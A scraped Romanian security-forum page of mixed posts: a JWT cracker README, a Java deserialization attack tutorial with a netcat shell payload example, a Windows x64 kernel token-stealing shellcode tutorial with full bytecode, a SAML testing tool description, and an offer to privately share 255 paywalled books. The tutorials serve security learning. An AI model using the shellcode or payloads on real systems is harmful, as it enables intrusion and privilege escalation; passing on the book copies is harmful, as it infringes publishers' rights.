Leaderboard

Atata se da lumea cu fundul de pamant pe forumuri si pe net in general ca vezi-doamne, platesc bani, etc. Cateva motive pentru care nu vor plati nici un ban: - nu au nici o garantie ca se vor tine de cuvant si nu vor posta nimic in public - nu au nici o garantie ca dupa ce vor primi anumite sume nu vor cere mai mult ca sa nu posteze in public - ar fi suicid din punct de vedere PR (mai ales cum muricanii au lozinca "we don't negotiate with terrorists") si ar fi linsati mediatic, ridiculizati, etc. I-ar costa mult mai mult marketing-ul si advertising-ul dupa - ar da tonul si invita in mod indirect si alte atacuri. Daca ar vedea indienii si pakistanezii ca platesc pai ar sta in carca lor 24/7. Sa nu mai vorbim de rusi, chinezi si alte cele. - momentan probabil vor sa traga de timp caci mai sunt 2 episoade din Game of Thrones si apoi ii doare la basca. Vor sa dea si cat mai mult timp celor de la FBI care sunt pe fir - astfel de intelegeri se fac de obicei in mod foarte discret, cu oameni inteligenti pe ambele parti, fara tam-tam mediatic. Spre exemplu pe o platforma unde ma uitam sa investesc acum ceva vreme, au avut un breach si apoi extract din info ce am primit:

Will this presentation make me an optical engineer? Maybe, but just remember, I omitted almost all the math. The purpose of this tutorial is to touch on a little bit of every topic, from the mundane to the advanced and unusual. But it helps to have a basic understanding of how and why things work, even if you aren’t designing fiber networks. https://www.nanog.org/sites/default/files/2_Steenbergen_Tutorial_New_And_v2.pdf

Bati campii rau de tot cu asta. Stau in aceeasi casa, respira acelasi aer, mananca impreuna, au planuri de viata impreuna. Nu crezi ca ar fi mai ok ca ea sa dea cartile pe fata daca o arde aiurea? Se vede ca esti inca necopt. Stai o viata alaturi de un om si tot nu ajungi sa-l cunosti. Crezi ca la toate dai cu programare cand nu mai merg lucrurile sau cand nu-ti convine ceva? Internetu' nu e viata. Ce vorbeste el acolo, e viata. Mai iesi si tu din casa, du-te si imbata-te, mergi la curve, lasa fitilele astea.

JWT cracker A multi-threaded JWT brute-force cracker written in C. If you are very lucky or have a huge computing power, this program should find the secret key of a JWT token, allowing you to forge valid tokens. This is for testing purposes only, do not put yourself in trouble I used the Apple Base64 implementation that I modified slightly. Compile Make sure you have openssl's headers installed. On Ubuntu you can install them with apt-get install libssl-dev make If you use a Mac, you can install OpenSSL with brew install openssl, but the headers will be stored in a different location: make OPENSSL=/usr/local/opt/openssl/include OPENSSL_LIB=-L/usr/local/opt/openssl/lib Run $ > ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE In the above example, the key is Sn1f. It takes approximately 2 seconds to crack on my Macbook. Contribute No progress status If you stop the program, you cannot start back where you were IMPORTANT: Known bugs The base64 implementation I use (from Apple) is sometimes buggy because not every Base64 implementation is the same. So sometimes, decrypting of your Base64 token will only work partially and thus you will be able to find a secret to your token that is not the correct one. If someone is willing to implement a more robust Base64 implementation, that would be great Download c-jwt-cracker-master.zip Source: https://github.com/brendan-rius/c-jwt-cracker

Attacking Java Deserialization Deserialization vulnerabilities are far from new, but exploiting them is more involved than other common vulnerability classes. During a recent client engagement I was able to take advantage of Java deserialization to gain a foothold on a server from where I was able to obtain root access to tens of servers spanning pre-production and production environments across multiple data centres. The vulnerability I discovered had previously survived multiple pentests and I would have missed it too if I hadn’t had prior exposure to Java (de)serialization. In this blog post I’ll attempt to clear up some confusion around deserialization vulnerabilities and hopefully lower the bar to entry in exploiting them using readily available tools. I’ll be focusing on Java, however the same concepts apply to other languages. I’ll also be focusing on command execution exploits in order to keep things simple. I spoke about this topic at SteelCon this year and will also be speaking on the topic at BSides Manchester and BSides Belfast (on that note, I’m also speaking about poking one of Java’s back doors at 44con this year)! (De)serialization Briefly, serialization is the process of converting runtime variables and program objects into a form that can be stored or transmitted. Deserialization is the reverse process that converts the serialized form back into in-memory variables and program objects. The serialized form could be a text-based format such as JSON or XML, or a binary format. Many higher level languages such as C#, Java, and PHP have built-in support for data serialization which is trivial to use and saves the developer from having to implement these routines themselves. In this blog post I’ll be focusing on Java’s built-in serialization format but other formats can come with similar risks (check out Alvaro Muñoz and Oleksandr Mirosh’s Black Hat USA 2017 and Def Con 25 talk Friday the 13th: JSON Attacks for more on this). What’s the Problem? The use of (de)serialization isn’t a problem itself. Problems arise when a user (attacker) can control the data being deserialized, for example if data can be delivered to the deserialization routine over a network connection. If an attacker has control of data being deserialized, then they have some influence over in-memory variables and program objects. Subsequently, if an attacker can influence in-memory variables and program objects, then they can influence the flow of code that uses those variables and objects. Let’s look at an example of Java deserialization: public class Session { public String username; public boolean loggedIn; public void loadSession(byte[] sessionData) throws Exception { ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(sessionData)); this.username = ois.readUTF(); this.loggedIn = ois.readBoolean(); } } 1 2 3 4 5 6 7 8 9 10 public class Session { public String username; public boolean loggedIn; public void loadSession(byte[] sessionData) throws Exception { ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(sessionData)); this.username = ois.readUTF(); this.loggedIn = ois.readBoolean(); } } The ‘loadSession’ method accepts an array of bytes as a parameter and deserializes a string and a boolean from that byte array into the ‘username’ and ‘loggedIn’ properties of the object. If an attacker can control the contents of the ‘sessionData’ byte array passed to this method then they can control these object properties. The following is an example of how this Session object might be used: public class UserSettingsController { public void updatePassword(Session session, String newPassword) throws Exception { if(session.loggedIn) { UserModel.updatePassword(session.username, newPassword); } else { throw new Exception("Error: User not logged in."); } } } 1 2 3 4 5 6 7 8 9 public class UserSettingsController { public void updatePassword(Session session, String newPassword) throws Exception { if(session.loggedIn) { UserModel.updatePassword(session.username, newPassword); } else { throw new Exception("Error: User not logged in."); } } } If the session is logged in then the password for the user whose username is stored in the session is updated to the given value. This is a simple example of a ‘POP Gadget’, a snippet of code that we have some control over via the properties of an object. Property-Oriented Programming When we control object properties and use them to influence the flow of code execution in this way we are doing what’s known as ‘property-oriented programming’. A POP gadget is a code snippet that we can influence to our advantage by manipulating the properties of some object. Often multiple gadgets will need chaining in order to create a complete exploit. We can think of this as high-level ROP (return-oriented programming – a technique used in memory corruption exploits) except that instead of a ROP gadget pushing a value onto the stack, a POP gadget might allow us to write some data to a file. An important point here is that a deserialization exploit does not involve sending classes or code to the server to execute. We’re simply sending the properties of classes that the server is already aware of in order to manipulate existing code that deals with those properties. A successful exploit hence relies on knowledge of the code that can be manipulated through deserialization. This is where a lot of the difficulty in exploiting deserialization vulnerabilities stems from. Interesting Gadgets POP gadgets can exist anywhere in a program, the only requirements are that the code can be manipulated using the properties of deserialized objects, and that an attacker can control the data being deserialized. Some gadgets are of greater interest, however, because their execution is more predictable. In Java, a serializable class can define a method named ‘readObject‘ which can be used to perform special handling during deserialization (for example supporting backwards compatibility). This method can also be used to respond to the event of an object of that class being deserialized. An example use of this method might be for a database manager object to automatically establish a connection to the database when it is deserialized into memory. Most Java serialization exploits take advantage of the code within these readObject methods because the code is guaranteed to be executed during deserialization. Exploiting Deserialization To exploit a deserialization vulnerability we need two key things: An entry point that allows us to send our own serialized objects to the target for deserialization. One or more code snippets that we can manipulate through deserialization. Entry Points We can identify entry points for deserialization vulnerabilities by reviewing application source code for the use of the class ‘java.io.ObjectInputStream’ (and specifically the ‘readObject’ method), or for serializable classes that implement the ‘readObject’ method. If an attacker can manipulate the data that is provided to the ObjectInputStream then that data presents an entry point for deserialization attacks. Alternatively, or if the Java source code is unavailable, we can look for serialized data being stored on disk or transmitted over the network, provided we know what to look for! The Java serialization format begins with a two-byte magic number which is always hex 0xAC ED. This is followed by a two-byte version number. I’ve only ever seen version 5 (0x00 05) but earlier versions may exist and in future later versions may also exist. Following the four-byte header are one or more content elements, the first byte of each should be in the range 0x70 to 0x7E and describes the type of the content element which is used to infer the structure of the following data in the stream. For more details see Oracle’s documentation on the Object Serialization Stream Protocol. People often say to look for the four-byte sequence 0xAC ED 00 05 in order to identify Java serialization, and in fact some IDS signatures look for this sequence to detect attacks. During my recent client engagement I didn’t immediately see those four bytes because the target client application kept a network connection to the server open the entire time it was running and the four-byte header only exists once at the very beginning of a serialization stream. The client’s IDS missed my attacks for this reason – my payloads were sent later in the stream and separately from the serialization header. We can use an ASCII dump to help identify Java serialization data without relying on the four-byte 0xAC ED 00 05 header. The most obvious indicator of Java serialization data is the presence of Java class names in the dump, such as ‘java.rmi.dgc.Lease’. In some cases Java class names might appear in an alternative format that begins with an ‘L’, ends with a ‘;’, and uses forward slashes to separate namespace parts and the class name (e.g. ‘Ljava/rmi/dgc/VMID;’). Along with Java class names, there are some other common strings that appear due to the serialization format specification, such as ‘sr’ which may represent an object (TC_OBJECT) followed by its class description (TC_CLASSDESC), or ‘xp’ which may indicate the end of the class annotations (TC_ENDBLOCKDATA) for a class which has no super class (TC_NULL). Having identified the use of serialized data, we need to identify the offset into that data where we can actually inject a payload. The target needs to call ‘ObjectInputStream.readObject’ in order to deserialize and instantiate an object (payload) and support property-oriented programming, however it could call other ObjectInputStream methods first, such as ‘readInt’ which will simply read a 4-byte integer from the stream. The readObject method will read the following content types from a serialization stream: 0x70 – TC_NULL 0x71 – TC_REFERENCE 0x72 – TC_CLASSDESC 0x73 – TC_OBJECT 0x74 – TC_STRING 0x75 – TC_ARRAY 0x76 – TC_CLASS 0x7B – TC_EXCEPTION 0x7C – TC_LONGSTRING 0x7D – TC_PROXYCLASSDESC 0x7E – TC_ENUM In the simplest cases an object will be the first thing read from the serialization stream and we can insert our payload directly after the 4-byte serialization header. We can identify those cases by looking at the first five bytes of the serialization stream. If those five bytes are a four-byte serialization header (0xAC ED 00 05) followed by one of the values listed above then we can attack the target by sending our own four-byte serialization header followed by a payload object. In other cases, the four-byte serialization header will most likely be followed by a TC_BLOCKDATA element (0x77) or a TC_BLOCKDATALONG element (0x7A). The former consists of a single byte length field followed by that many bytes making up the actual block data and the latter consists of a four-byte length field followed by that many bytes making up the block of data. If the block data is followed by one of the element types supported by readObject then we can inject a payload after the block data. I wrote a tool to support some of my research in this area, SerializationDumper, which we can use to identify entry points for deserialization exploits. The tool parses Java serialization streams and dumps them out in a human-readable form. If the stream contains one of the element types supported by readObject then we can replace that element with a payload object. Below is an example of its use: $ java -jar SerializationDumper-v1.0.jar ACED00057708af743f8c1d120cb974000441424344 STREAM_MAGIC - 0xac ed STREAM_VERSION - 0x00 05 Contents TC_BLOCKDATA - 0x77 Length - 8 - 0x08 Contents - 0xaf743f8c1d120cb9 TC_STRING - 0x74 newHandle 0x00 7e 00 00 Length - 4 - 0x00 04 Value - ABCD - 0x41424344 1 2 3 4 5 6 7 8 9 10 11 $ java -jar SerializationDumper-v1.0.jar ACED00057708af743f8c1d120cb974000441424344 STREAM_MAGIC - 0xac ed STREAM_VERSION - 0x00 05 Contents TC_BLOCKDATA - 0x77 Length - 8 - 0x08 Contents - 0xaf743f8c1d120cb9 TC_STRING - 0x74 newHandle 0x00 7e 00 00 Length - 4 - 0x00 04 Value - ABCD - 0x41424344 In this example the stream contains a TC_BLOCKDATA followed by a TC_STRING which can be replaced with a payload. Objects in a serialization stream are instantiated as they are loaded, rather than after the entire stream has been parsed. This fact allows us to inject payloads into a serialization stream without worrying about correcting the remainder of the stream. The payload will be deserialized and executed before any kind of validation happens and before the application attempts to read further data from the serialization stream. POP Gadgets Having identified an entry point that allows us to provide our own serialized objects for the target to deserialize, the next thing we need are POP gadgets. If we have access to the source code then we can look for ‘readObject’ methods and code following calls to ‘ObjectInputStream.readObject’ in order to work out what potential gadgets exist. Often we don’t have access to application source code but this doesn’t prevent us from exploiting deserialization vulnerabilities because there are lots of commonly used third-party libraries that can be targeted. Researchers including Chris Frohoff and Gabriel Lawrence have already found POP gadget chains in various libraries and released a tool called ‘ysoserial‘ that can generate payload objects. This tool greatly simplifies the process of attacking Java deserialization vulnerabilities! There are a lot of gadget chains included in ysoserial so the next step is to work out which, if any, can be used against the target. Background knowledge about the third-party libraries used by the application, or an information disclosure issue, should be the first port of call. If we know which third-party libraries are used by the target then we can select the appropriate ysoserial payload(s) to try. Unfortunately this information might not be readily available in which case we can, with caution, cycle through the various ysoserial gadget chains until we find one we can use. Care should be taken with this approach as there is always a risk of triggering an unhandled exception and crashing the target application. The target would have to be particularly unstable for this to happen, however, as even an nmap version scan would likely cause the target to crash if it couldn’t handle unexpected/malformed data. If the target application responds to a ysoserial payload with a ‘ClassNotFoundException’ then chances are that the library targeted by the chosen gadget chain is not available to the target application. A ‘java.io.IOException’ with the message ‘Cannot run program’ likely means that the gadget chain worked, however the operating system command that the gadget chain attempted to execute was not available on the server. The ysoserial command execution payloads are blind payloads and the command output is not returned. There are also a couple of limitations due to the use of ‘java.lang.Runtime.exec(String)’. The first is that shell operators such as output redirection and piping are not supported. The second is that parameters to the payload command cannot contain spaces (e.g. we can use “nc -lp 31313 -e /bin/sh” but we can’t use “perl -e ‘use Socket;…'” because the parameter to perl contains a space). Fortunately there’s a nice payload encoder/generator available online which can get around these limitations here: http://jackson.thuraisamy.me/runtime-exec-payloads.html. Try it Yourself – DeserLab and SerialBrute It’s important to understand serialization and how deserialization exploits work (e.g. property-oriented programming) in order to effectively exploit deserialization vulnerabilities. Doing so is still more involved than other common vulnerability classes so it’s helpful to have a target to practice on. Along with this blog post, I’ve created and released a demo application called ‘DeserLab‘ that implements a custom network protocol on top of the Java serialization format. The application is vulnerable to deserialization attacks and should be exploitable using the information provided in this blog post. ‘SerialBrute‘ is a pair of Python scripts that I wrote and use to automate testing of ysoserial payloads against arbitrary targets. The first, SerialBrute.py’, can replay a TCP conversation or HTTP request and inject a payload at a given point while the second, ‘SrlBrt.py’ is a skeleton script that can be altered to deliver payloads where special processing is needed. Both attempt to detect valid and invalid payloads by looking at returned exceptions. These scripts are not intended to be full blown or polished attack tools and should be used with caution due to the risk of knocking an application over but I’ve personally had great success replaying TCP conversations and injecting ysoserial gadget chains. Thanks for reading! Have a go at DeserLab if this is something you’re interested in and if there’s anything I’ve missed, anything that could do with further explanation, or you have any questions or feedback please leave a comment or get in touch on Twitter (@NickstaDB)! Sursa: https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/

A Primer to Windows x64 shellcoding • Posted by hugsy on August 14, 2017 • windows • kernel • debugging • exploit • token • shellcode Continuing on the path to Windows kernel exploitation… Thanks to the previous post, we now have a working lab for easily (and in a reasonably fast manner) debug Windows kernel. Let’s skip ahead for a minute and assume we control PC using some vulnerability in kernel land (next post), then we may want to jump back into a user allocated buffer to execute a control shellcode. So where do we go from now? How to transform this controlled PC in the kernel-land into a privileged process in user-land? The classic technique is to steal the System process token and copy it into the structure of our targeted arbitrary (but unprivileged) process (say cmd.exe). Note: our target here will the Modern.IE Windows 8.1 x64 we created in the previous post, that we’ll interact with using kd via Network debugging. Refer to previous post if you need to set it up. Stealing SYSTEM token using kd The !process extension of WinDBG provides a structured display of one or all the processes. kd> !process 0 0 System PROCESS ffffe000baa6c040 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 001a7000 ObjectTable: ffffc0002f403000 HandleCount: <Data Not Accessible> Image: System This leaks the address of the _EPROCESS structure in the kernel, of the proces named System. Using dt will provide a lot more info (here, massively truncated to what interests us): kd> dt _EPROCESS ffffe000baa6c040 ntdll!_EPROCESS +0x000 Pcb : _KPROCESS [...] +0x2e0 UniqueProcessId : 0x00000000`00000004 Void +0x2e8 ActiveProcessLinks : _LIST_ENTRY [ 0xffffe000`bbc54be8 - 0xfffff801`fed220a0 ] [...] +0x348 Token : _EX_FAST_REF [...] +0x430 PageDirectoryPte : 0 +0x438 ImageFileName : [15] "System" At nt!_EPROCESS.Token (+0x348) we get the process token, which holds a pointer to an “Executive Fast Reference” structure. kd> dt nt!_EX_FAST_REF ffffe000baa6c040+348 +0x000 Object : 0xffffc000`2f405598 Void +0x000 RefCnt : 0y1000 +0x000 Value : 0xffffc000`2f405598 If we nullify the last nibble of the address (i.e. AND with -0xf on x64, -7 on x86), we end up having the System token’s address: kd> ? 0xffffc000`2f405598 & -f Evaluate expression: -70367951432304 = ffffc000`2f405590 kd> dt nt!_TOKEN ffffc000`2f405590 +0x000 TokenSource : _TOKEN_SOURCE +0x010 TokenId : _LUID +0x018 AuthenticationId : _LUID +0x020 ParentTokenId : _LUID +0x028 ExpirationTime : _LARGE_INTEGER 0x06207526`b64ceb90 +0x030 TokenLock : 0xffffe000`baa4ef90 _ERESOURCE +0x038 ModifiedId : _LUID +0x040 Privileges : _SEP_TOKEN_PRIVILEGES +0x058 AuditPolicy : _SEP_AUDIT_POLICY [...] Note: the WinDBG extension !token provides a more detailed (and parsed) output. You might to refer to it instead whenever you are analyzing tokens. So basically, if we create a process (say cmd.exe), and overwrite its token with the System token value we found (0xffffc0002f405590), our process will be running as System. Let’s try! We search our process using kd: kd> !process 0 0 cmd.exe PROCESS ffffe000babfd900 SessionId: 1 Cid: 09fc Peb: 7ff6fa81c000 ParentCid: 0714 DirBase: 45c4c000 ObjectTable: ffffc00036d03940 HandleCount: <Data Not Accessible> Image: cmd.exe Overwrite the offset 0x348 with the SYSTEM token pointer (0xffffc0002f405590). kd> dq ffffe000bc043900+348 l1 ffffe000`bc043c48 ffffc000`30723426 kd> eq 0xffffe000babfd900+0x348 0xffffc0002f405590 And tada … Now we know how to transform any unprivileged process into a privileged one using kd. Shellcoding our way to SYSTEM So the basic idea now, to reproduce the same steps that we did in the last part, but from our shellcode. So we need: A pointer to System EPROCESS structure, and save the token (located at offset +0x348) Look up for the current process EPROCESS structure Overwrite its token with System’s Profit! Getting the current process structure address Pointers to process structures on Windows are stored in a doubly linked list (see the member ActiveProcessLinks of nt!_EPROCESS in kd). If we have the address to one process, we can “scroll” back and forward to discover the others. But first, we need to get the address of at the least one process in the kernel. This is exactly the purpose of the routine nt!PsGetCurrentProcess, but since we can’t call it directly (thank you ASLR), we can still check what is it doing under the hood: kd> uf nt!PsGetCurrentProcess nt!PsGetCurrentProcess: fffff801`feb06e84 65488b042588010000 mov rax,qword ptr gs:[188h] fffff801`feb06e8d 488b80b8000000 mov rax,qword ptr [rax+0B8h] fffff801`feb06e94 c3 ret kd> dps gs:188 l1 002b:00000000`00000188 fffff801`fedbfa00 nt!KiInitialThread mov rax, qword ptr gs:[188h] returns a pointer to an _ETHREAD structure (more specifically the kernel thread (KTHREAD) nt!KiInitialThread). If we check the content of this structure at the offset 0xb8, we find the structure to the current process: kd> dt nt!_EPROCESS poi(nt!KiInitialThread+b8) +0x000 Pcb : _KPROCESS [...] +0x2e0 UniqueProcessId : 0x00000000`00000004 Void +0x2e8 ActiveProcessLinks : _LIST_ENTRY [ 0xffffe000`bbc54be8 - 0xfffff801`fed220a0 ] [...] +0x348 Token : _EX_FAST_REF So now we know where our current process resides in the kernel (just like kd gave us using !process 0 0 cmd.exe earlier), and therefore the first of our shellcode: mov rax, gs:0x188 mov rax, [rax + 0xb8] Browsing through the process list to reach System The processes are stored in the ActiveProcessLinks (offset 0x2e8) of the nt!_EPROCESS structure, via a _LIST_ENTRY, which is a doubly linked list in its simplest form: kd> dt _LIST_ENTRY ntdll!_LIST_ENTRY +0x000 Flink : Ptr64 _LIST_ENTRY +0x008 Blink : Ptr64 _LIST_ENTRY Since we know that System process ID is 4, we can write a very small loop in assembly, whose pseudo-C code would be: ptrProcess = curProcess while ptrProcess->UniqueProcessId != SystemProcess->UniqueProcessId (4) { ptrProcess = ptrProcess->Flink } Which builds the second part of our shellcode: ;; rax has the pointer to the current KPROCESS mov rbx, rax __loop: mov rbx, [rbx + 0x2e8] ;; +0x2e8 ActiveProcessLinks[0].Flink sub rbx, 0x2e8 ;; nextProcess mov rcx, [rbx + 0x2e0] ;; +0x2e0 UniqueProcessId cmp rcx, 4 ;; compare to target PID jnz __loop ;; here rbx hold a pointer to System structure Overwrite the current process token field with System’s This is the third and final part of our shellcode, and the easiest since everything was done in the steps above: ;; rax has the pointer to the current KPROCESS ;; rbx has the pointer to System KPROCESS mov rcx, [rbx + 0x348] ;; +0x348 Token and cl, 0xf0 ;; we must clear the lowest nibble mov [rax + 0x348], rcx The final shellcode We add a few extra instructions to correctly save and restore the context, and make sure we exit cleanly: ;; ;; Token stealing shellcode for Windows 8.1 x64 ;; ;; Save the current context on the stack push rax push rbx push rcx ;; Get the current process mov rax, gs:0x188 mov rax, [rax+0xb8] ;; Loop looking for System PID mov rbx, rax mov rbx, [rbx+0x2e8] sub rbx, 0x2e8 mov rcx, [rbx+0x2e0] cmp rcx, 4 jnz -0x19 ;; Token overwrite mov rcx, [rbx + 0x348] and cl, 0xf0 mov [rax + 0x348], rcx ;; Cleanup pop rcx pop rbx pop rax pop rax pop rax pop rax pop rax pop rax xor rax, rax ret view raw win81-token-stealing-shellcode.asm hosted with ❤ by GitHub We can now simply use any assembler (NASM, YASM) - but I have a personal preference for Keystone-Engine - to generate a bytecode version of our shellcode. #define LEN 80 const char sc[LEN] = "" "\x50" // push rax "\x53" // push rbx "\x51" // push rcx "\x48\x65\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // mov rax, gs:0x188 "\x48\x8b\x80\xb8\x00\x00\x00" // mov rax, [rax+0xb8] "\x48\x89\xc3" // mov rbx, rax "\x48\x8b\x9b\xe8\x02\x00\x00" // mov rbx, [rbx+0x2e8] "\x48\x81\xeb\xe8\x02\x00\x00" // sub rbx, 0x2e8 "\x48\x8b\x8b\xe0\x02\x00\x00" // mov rcx, [rbx+0x2e0] "\x48\x83\xf9\x04" // cmp rcx, 4 "\x75\x15" // jnz 0x17 "\x48\x8b\x8b\x48\x03\x00\x00" // mov rcx, [rbx + 0x348] "\x48\x89\x88\x48\x03\x00\x00" // mov [rax + 0x348], rcx "\x59" // pop rcx "\x5b" // pop rbx "\x58" // pop rax "\x58\x58\x58\x58\x58" // pop rax; pop rax; pop rax; pop rax; pop rax; (required for proper stack return) "\x48\x31\xc0" // xor rax, rax (i.e. NT_SUCCESS) "\xc3" // ret ""; Once copied into an executable location, this shellcode will grant the current process with all System privileges. The next post will actually use this newly created shellcode in a concrete vulnerability exploitation (from the Extremely Vulnerable Driver by HackSys Team). Until then, take care! Recommended readings A Guide to Kernel Exploitation - Attacking The Core Introduction To Windows Shellcode Development x64 Kernel Privilege Escalation Well-Known Security IDentifiers Sursa: https://blahcat.github.io/2017/08/14/a-primer-to-windows-x64-shellcoding/

Description SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates. This software was created by Roland Bischofberger and Emanuel Duss during a bachelor thesis at the Hochschule für Technik Rapperswil (HSR). Our project partner and advisor was Compass Security Schweiz AG. We thank Compass for the nice collaboration and support during our bachelor thesis. Features The extension is divided in two parts. A SAML message editor and a certificate management tool. Message Editor Features of the SAML Raider message editor: Sign SAML Messages Sign SAML Assertions Remove Signatures Edit SAML Message (Supported Messages: SAMLRequest and SAMLResponse) Preview eight common XSW Attacks Execute eight common XSW Attacks Send certificate to SAMl Raider Certificate Management Undo all changes of a SAML Message Supported Profiles: SAML Webbrowser Single Sign-on Profile, Web Services Security SAML Token Profile Supported Bindings: POST Binding, Redirect Binding, SOAP Binding, URI Binding Certificate Management Features of the SAML Raider Certificate Management: Import X.509 certificates (PEM and DER format) Import X.509 certificate chains Export X.509 certificates (PEM format) Delete imported X.509 certificates Display informations of X.509 certificates Import private keys (PKCD#8 in DER format and traditional RSA in PEM Format) Export private keys (traditional RSA Key PEM Format) Cloning X.509 certificates Cloning X.509 certificate chains Create new X.509 certificates Editing and self-sign existing X.509 certificates Download: saml-raider-1.2.1.jar Installation: https://github.com/SAMLRaider/SAMLRaider#installation Source: https://github.com/SAMLRaider/SAMLRaider

Pentru cei carora le place sa citeasca, si se descurca cu engleza, ofer gratuit capitole sau urmatoarele (255) carti intregi in format PDF de pe CRCnetBASE, majoritatea nu pot fi gasite pe torrente sau site-uri de ebooks grauite. Din anumite motive bine intemeiate, imi rezerv dreptul de a trimite aceste carti doar anumitor persoane. Tinand cont ca e un proces manual si trebuie sa imi iau niste masuri de siguranta, e posibil sa dureze ceva daca doriti multe carti sau am un backlog de cereri. Pentru a vedea un rezumat/abstract al cartii inainte sa o cereti, si pentru a salva timpul meu si al vostru, recomand mai intai sa dati un search pe pagina aceasta la titlul cartii in acest field si in dreapta va aparea un pdf gratuit cu rezumatul/abstractul/contents: Cererile doar prin mesaj privat, aici doar intrebari/nelamuriri/probleme va rog. Thx. UPDATE: Va rog pentru inceput sa cereti doar cate putin, cat cititi odata, nu la gramada tot ce pare fain, ca sa pot servi pe toata lumea. Cand terminati mai trimit - nu plec niciunde. Thx. Lista completa a cartilor: 802.1X Port-Based Authentication A Practical Guide to Security Assessments A Practical Guide to Security Engineering and Information Assurance A Technical Guide to IPSec Virtual Private Networks Adaptive Security Management Architecture Advances in Biometrics for Secure Human Authentication and Recognition Algebraic and Stochastic Coding Theory Algebraic Curves in Cryptography Algorithmic Cryptanalysis An Introduction to Cryptography, Second Edition Android Malware and Analysis Android Security, Attacks and Defenses Anonymous Communication Networks, Protecting Privacy on the Web Architecting Secure Software Systems Assessing and Managing Security Risk in IT Systems, A Structured Methodology Asset Protection and Security Management Handbook Asset Protection through Security Awareness Audit and Trace Log Management, Consolidation and Analysis Authentication Codes and Combinatorial Designs Automatic Defense Against Zero-day Polymorphic Worms in Communication Networks Building A Global Information Assurance Program Building an Effective Information Security Policy Architecture Building an Information Security Awareness Program Building and Implementing a Security Certification and Accreditation Program, OFFICIAL (ISC)2 GUIDE to the CAPcm CBK Business Resumption Planning Call Center Continuity Planning Case Studies in Intelligent Computing, Achievements and Trends Case Studies in Secure Computing, Achievements and Trends CISO Soft Skills, Securing Organizations Impaired by Employee Politics, Apathy, and Intolerant Perspectives CISO's Guide to Penetration Testing, A Framework to Plan, Manage, and Maximize Benefits Complete Book of Remote Access, Connectivity and Security Complete Guide to CISM Certification Complete Guide to Security and Privacy Metrics, Measuring Regulatory Compliance, Operational Resilience, and ROI Computer Security Literacy, Staying Safe in a Digital World Conducting Network Penetration and Espionage in a Global Environment Conflict and Cooperation in Cyberspace, The Challenge to National Security Core Software Security, Security at the Source Critical Incident Management Critical Infrastructure System Security and Resiliency Critical Infrastructure, Understanding Its Component Parts, Vulnerabilities, Operating Risks, and Interdependencies Cryptanalysis of RSA and Its Variants Cultural Property Security, Protecting Museums, Historic Sites, Archives, and Libraries Curing the Patch Management Headache Cyber Crime Investigator's Field Guide, Second Edition Cyber Forensics, A Field Manual for Collecting, Examining, and Preserving Evidence of Computer Crimes Cyber Forensics, A Field Manual for Collecting, Examining, and Preserving Evidence of Computer Crimes, Second Edition Cyber Fraud, Tactics, Techniques and Procedures Cyber Power, Crime, Conflict and Security in Cyberspace Cyber Security Essentials Cybersecurity for Industrial Control Systems, SCADA, DCS, PLC, HMI, and SIS Cybersecurity, Public Sector Threats and Responses Cybervetting, Internet Searches for Vetting, Investigations, and Open-Source Intelligence, Second Edition Data Governance, Creating Value from Information Assets Data Mining and Machine Learning in Cybersecurity Data Mining Tools for Malware Detection Data Privacy for the Smart Grid Data Protection, Governance, Risk Management, and Compliance Database and Applications Security, Integrating Information Security and Data Management Data-driven Block Ciphers for Fast Telecommunication Systems Defense against the Black Arts, How Hackers Do What They Do and How to Protect against It Developing and Securing the Cloud Digital Forensics for Handheld Devices Digital Privacy, Theory, Technologies, and Practices Discrete Dynamical Systems and Chaotic Machines, Theory and Applications Disruptive Security Technologies with Mobile Code and Peer-to-Peer Networks Distributed Networks, Intelligence, Security, and Applications Effective Surveillance for Homeland Security, Balancing Technology and Social Issues Effective Use of Teams for IT Audits Elliptic Curves, Number Theory and Cryptography, Second Edition Group Theoretic Cryptography Handbook of Applied Cryptography Handbook of Elliptic and Hyperelliptic Curve Cryptography Handbook of Financial Cryptography and Security Handbook of Finite Fields Handbook of Surveillance Technologies, Third Edition Hardware Security, Design, Threats, and Safeguards Homeland Security and Private Sector Business, Corporations' Role in Critical Infrastructure Protection Homeland Security Handbook How to Develop and Implement a Security Master Plan Industrial Espionage, Developing a Counterespionage Program Information Assurance Architecture Information Security Architecture, An Integrated Approach to Security in the Organization Information Security Architecture, An Integrated Approach to Security in the Organization, Second Edition Information Security Cost Management Information Security Fundamentals, Second Edition Information Security Governance Simplified, From the Boardroom to the Keyboard Information Security Management Handbook on CD-ROM, 2006 Edition Information Security Management Handbook, Fifth Edition, Volume 3 Information Security Management Handbook, Four Volume Set Information Security Management Handbook, Fourth Edition, Volume 4 Information Security Management Handbook, Sixth Edition Information Security Management Handbook, Sixth Edition, Volume 2 Information Security Management Handbook, Sixth Edition, Volume 3 Information Security Management Handbook, Sixth Edition, Volume 4 Information Security Management Handbook, Sixth Edition, Volume 5 Information Security Management Handbook, Sixth Edition, Volume 6 Information Security Management Handbook, Volume 2 Insider Computer Fraud, An In-depth Framework for Detecting and Defending against Insider IT Attacks Intelligent Network Video, Understanding Modern Video Surveillance Systems Intelligent Video Surveillance, Systems and Technology Investigations in the Workplace, Second Edition Investigator's Guide to Steganography Iris Biometric Model for Secured Network Access IT Auditing and Sarbanes-Oxley Compliance, Key Strategies for Business Improvement IT Security Governance Guidebook with Security Program Metrics on CD-ROM Lattice Basis Reduction, An Introduction to the LLL Algorithm and Its Applications Machine Learning Forensics for Law Enforcement, Security, and Intelligence Malicious Bots, An Inside Look into the Cyber-Criminal Underground of the Internet Managing A Network Vulnerability Assessment Managing an Information Security and Privacy Awareness and Training Program Managing an Information Security and Privacy Awareness and Training Program, Second Edition Managing Risk and Security in Outsourcing IT Services, Onshore, Offshore and the Cloud Managing the Insider Threat, No Dark Corners Managing Trust in Cyberspace Mechanics of User Identification and Authentication, Fundamentals of Identity Management Multilevel Modeling of Secure Systems in QoP-ML Multilevel Security for 